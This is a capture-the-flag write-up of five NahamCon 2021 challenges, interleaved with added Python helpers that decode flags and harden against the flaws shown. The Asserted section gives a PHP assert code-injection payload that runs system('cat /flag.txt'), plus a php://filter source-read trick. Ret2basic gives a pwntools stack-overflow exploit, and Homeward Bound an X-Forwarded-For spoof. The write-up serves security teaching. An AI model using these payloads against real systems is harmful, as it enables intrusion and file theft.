NahamCon CTF 2021 (partial writeup)

Posted by admin

Chicken Wings

Decode it online:

http://grompe.org.ru/static/wingdings_gaster.html

Then convert the result to all lowercase.

Shoelaces

Open the image in 010 Editor.

Searching for the string flag turns up the marker:

esab64

That is "base64" written backwards, which hints that the data was reversed around the encoding.

flag = "mxWYntnZiVjMxEjY0kDOhZWZ4cjYxIGZwQmY2ATMxEzNlFjNl13X"
print(flag[::-1])  # reverse the string, then base64-decode the output

flag2 = "_}e61e711106bd0db1b78efa894b1125bf{galf"
print(flag2[::-1])  # the base64-decoded text is reversed as well

The first print gives the base64 text:

X31lNjFlNzExMTA2YmQwZGIxYjc4ZWZhODk0YjExMjViZntnYWxm

Base64-decoding it yields flag2 above; reversing that gives the flag:

flag{fb5211b498afe87b1bd0db601117e16e}_
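The whole decode chain in one script, as an added example that is not part of the original writeup. It embeds the string found in the image, performs the three manual steps (reverse, base64-decode, reverse), and also generalises them: decode_any_direction tries both orientations, keeps the one that decodes to printable text, and turns the result around so that "flag{" reads forwards. The function names are my own.

```python
import base64
import binascii
import string

PRINTABLE = set(string.printable)

# Constructed sample: the text found after the "esab64" marker in the image.
ENCODED = "mxWYntnZiVjMxEjY0kDOhZWZ4cjYxIGZwQmY2ATMxEzNlFjNl13X"


def b64_if_printable(candidate: str):
    """Return the base64 decoding of candidate if it is valid base64 and
    decodes to printable text, otherwise None."""
    try:
        raw = base64.b64decode(candidate, validate=True)
    except (binascii.Error, ValueError):
        return None
    # bytes >= 0x80 become U+FFFD, which is not printable, so they reject the candidate
    text = raw.decode("ascii", errors="replace")
    return text if set(text) <= PRINTABLE else None


def decode_shoelaces(encoded: str) -> str:
    """Reverse, base64-decode, reverse: the three steps the writeup performs by hand."""
    layer = base64.b64decode(encoded[::-1]).decode("ascii")
    return layer[::-1]


def decode_any_direction(encoded: str) -> str:
    """Generalisation: try the string as-is and reversed, then orient the
    decoded text so that the flag marker reads forwards."""
    for candidate in (encoded, encoded[::-1]):
        text = b64_if_printable(candidate)
        if text is None:
            continue
        return text if "flag{" in text else text[::-1]
    raise ValueError("neither orientation is printable base64")


if __name__ == "__main__":
    print(decode_shoelaces(ENCODED))
    print(decode_any_direction(ENCODED))
```

The forward string is valid base64 too (52 characters from the base64 alphabet), but it decodes to bytes outside ASCII, which is why the printable check is what picks the right orientation rather than the decoder raising an error.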

Homeward Bound

Adding an X-Forwarded-For (XFF) header is enough to get the flag.

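An added example (not part of the original writeup) of why that one header works and how to close the hole. The naive function below resolves the client address the way the challenge appears to, trusting X-Forwarded-For from anyone; the hardened one only honours the header when the TCP peer is a proxy we operate, and then takes the rightmost entry, the one that proxy appended. The internal range, the trusted proxy address (an RFC 5737 documentation address) and the function names are assumptions of mine.

```python
from ipaddress import IPv4Address, IPv6Address, ip_address, ip_network
from typing import Dict, Union

Address = Union[IPv4Address, IPv6Address]

# Constructed values: a hypothetical "internal" range the application gates on,
# and the single reverse proxy we would trust to set X-Forwarded-For.
INTERNAL_NET = ip_network("10.0.0.0/8")
TRUSTED_PROXIES = {ip_address("192.0.2.10")}


def naive_client_ip(remote_addr: str, headers: Dict[str, str]) -> Address:
    """Trusts X-Forwarded-For from anyone: one added header makes any client look internal."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return ip_address(xff.split(",")[0].strip())
    return ip_address(remote_addr)


def hardened_client_ip(remote_addr: str, headers: Dict[str, str]) -> Address:
    """Honours X-Forwarded-For only when the TCP peer is one of our own proxies.
    Our proxy appends the real client to the right of whatever it received, so the
    rightmost entry is the only trustworthy one; everything left of it is client-supplied.
    Header names are assumed to be already normalised to this spelling."""
    peer = ip_address(remote_addr)
    if peer not in TRUSTED_PROXIES:
        return peer
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    return ip_address(hops[-1]) if hops else peer


def is_internal(addr: Address) -> bool:
    """The access decision the application makes on the resolved address."""
    return addr in INTERNAL_NET


if __name__ == "__main__":
    spoofed = {"X-Forwarded-For": "10.0.0.5"}
    print("naive:", is_internal(naive_client_ip("203.0.113.7", spoofed)))
    print("hardened:", is_internal(hardened_client_ip("203.0.113.7", spoofed)))
```

If the application sits behind more than one proxy layer, the number of trusted hops to skip from the right grows accordingly; what never changes is that the header is only meaningful when the direct peer is one of those proxies.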

Asserted

  • File inclusion

Looking at the page, the URL carries a ?page= parameter, which suggests a file inclusion.

Including the source through the php://filter wrapper returns it base64-encoded:

?page=php://filter/convert.base64-encode/resource=index

<?php

if (isset($_GET['page'])) {
  $page = $_GET['page'];
  $file = $page . ".php";

  // Saving ourselves from any kind of hackings and all
  assert("strpos('$file', '..') === false") or die("HACKING DETECTED! PLEASE STOP THE HACKING PRETTY PLEASE");
  
} else {
  $file = "home.php";
}

include($file);

?>

Line 8 of this code uses assert.

In PHP, a string passed to assert() is evaluated as PHP code, and here the user-controlled $file is interpolated straight into that string.

So we construct a payload that closes the string literal and the strpos() call around it:

Payload

?page=', '..') === false and system('cat /flag.txt') or true or strpos('

This gives the flag.

Reference

https://hydrasky.com/network-security/php-assert-vulnerable-to-local-file-inclusion/
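An added example (not the challenge's code) that shows the mechanism and a fix. interpolated_assertion rebuilds the string the vulnerable code hands to assert() so you can see the input become part of the PHP expression instead of data compared by strpos(); resolve_page is a replacement for the check that allowlists the page name and then confirms the resolved path stays under the pages directory, which rejects both the php://filter read and the injected expression. The directory, the allowed names and the function names are assumptions of mine.

```python
import os
import re
from typing import Optional

# Constructed values: a hypothetical directory of includable pages and the names allowed in it.
PAGES_DIR = "/var/www/pages"
ALLOWED_PAGES = {"home", "index"}
PAGE_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")


def interpolated_assertion(page: str) -> str:
    """Rebuild the string the vulnerable code passes to assert(): `$file = $page . ".php"`
    followed by "strpos('$file', '..') === false". Whatever is in page lands inside the
    single quotes of a PHP expression, so a quote in the input ends the string early."""
    file = page + ".php"
    return "strpos('" + file + "', '..') === false"


def resolve_page(page: Optional[str]) -> Optional[str]:
    """Hardened replacement for the check. Returns the path to include, or None to refuse.
    Step 1: the name must match a tight pattern and be on the allowlist, which rules out
    wrapper schemes (php://...), quotes and traversal outright.
    Step 2: even so, confirm the normalised path is still inside PAGES_DIR."""
    if page is None:
        page = "home"
    if not PAGE_NAME.fullmatch(page) or page not in ALLOWED_PAGES:
        return None
    path = os.path.normpath(os.path.join(PAGES_DIR, page + ".php"))
    if os.path.commonpath([PAGES_DIR, path]) != PAGES_DIR:
        return None
    return path


if __name__ == "__main__":
    print(interpolated_assertion("index"))
    print(resolve_page("index"))
    print(resolve_page("php://filter/convert.base64-encode/resource=index"))
```

The second step looks redundant next to the allowlist, but it keeps the function safe if someone later loosens the pattern or builds the allowlist from a directory listing.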

Ret2basic

Check the protections:

➜  ~ checksec ret2basic 
[*] '/home/yutian/ret2basic'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

vuln (decompiled)

__int64 vuln()
{
  char v1; // [rsp+0h] [rbp-70h]

  printf("Can you overflow this?: ");
  return gets(&v1);
}

win (decompiled)

void __noreturn win()
{
  int n; // [rsp+Ch] [rbp-14h]
  char *s; // [rsp+10h] [rbp-10h]
  FILE *stream; // [rsp+18h] [rbp-8h]

  stream = fopen("flag.txt", "r");
  if ( !stream )
  {
    puts("Failed to open the flag file.");
    exit(1);
  }
  fseek(stream, 0LL, 2);
  n = ftell(stream);
  rewind(stream);
  s = (char *)malloc(n);
  if ( !s )
  {
    puts("Failed to allocate memory.");
    exit(1);
  }
  fgets(s, n, stream);
  fclose(stream);
  puts("Here's your flag.");
  puts(s);
  free(s);
  exit(0);
}

The binary has no stack canary and no PIE, so overflowing the buffer into the return address and jumping to win() gives the flag.

The buffer sits at rbp-0x70, so the offset is 0x70 (plus 8 bytes of saved rbp before the return address).

Payload

from pwn import *

# io = process("./ret2basic")
io = remote("challenge.nahamcon.com", 30413)

# 0x70 bytes fill the buffer up to the saved rbp, 8 more cover the saved rbp,
# then the return address is overwritten with the address of win()
payload = b'a' * (0x70 + 0x8) + p64(0x0401215)

io.sendline(payload)

io.interactive()
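An added triage helper, not part of the original writeup: it parses the checksec output shown above into a dict, reports which missing mitigations make a plain stack overflow like this one exploitable and why, and derives the return-address offset from the decompiler's frame note ([rbp-70h] plus the 8-byte saved rbp), which should agree with the 0x70 + 0x8 used in the payload. The embedded input is copied from this page; the function names are mine.

```python
import re

# Constructed input: the checksec output and the decompiler's frame annotation from the writeup above.
CHECKSEC_OUTPUT = """\
[*] '/home/yutian/ret2basic'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
"""
VULN_BUFFER_NOTE = "char v1; // [rsp+0h] [rbp-70h]"


def parse_checksec(text: str) -> dict:
    """Turn checksec's 'Key:  value' lines into a dict; the '[*] path' line does not match and is skipped."""
    fields = {}
    for line in text.splitlines():
        m = re.fullmatch(r"\s*([A-Za-z]+):\s+(.+?)\s*", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def missing_mitigations(fields: dict) -> list:
    """List the mitigations that are absent, each with the reason it matters for a stack overflow."""
    findings = []
    if "no canary" in fields.get("Stack", "").lower():
        findings.append("Stack: no canary, so a gets() overflow overwrites the saved return address undetected")
    if fields.get("PIE", "").startswith("No PIE"):
        findings.append("PIE: disabled, so the address of win() is fixed and needs no leak")
    if fields.get("RELRO") != "Full RELRO":
        findings.append("RELRO: not full, so the GOT stays writable")
    if "disabled" in fields.get("NX", "").lower():
        findings.append("NX: disabled, so data placed on the stack could be executed")
    return findings


def return_address_offset(frame_note: str, saved_rbp_size: int = 8) -> int:
    """From a decompiler note such as '[rbp-70h]', compute the bytes that precede the saved return
    address: the buffer starts at rbp-0x70, so 0x70 bytes reach the saved rbp and saved_rbp_size
    more reach the return address (x86-64 frame with a saved rbp assumed)."""
    m = re.search(r"\[rbp-([0-9A-Fa-f]+)h\]", frame_note)
    if not m:
        raise ValueError("no rbp-relative offset in note")
    return int(m.group(1), 16) + saved_rbp_size


if __name__ == "__main__":
    fields = parse_checksec(CHECKSEC_OUTPUT)
    for finding in missing_mitigations(fields):
        print(finding)
    print(hex(return_address_offset(VULN_BUFFER_NOTE)))
```

The same parser works on any binary's checksec output, so it doubles as a quick pre-deployment check that a build was actually compiled with a canary and PIE.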
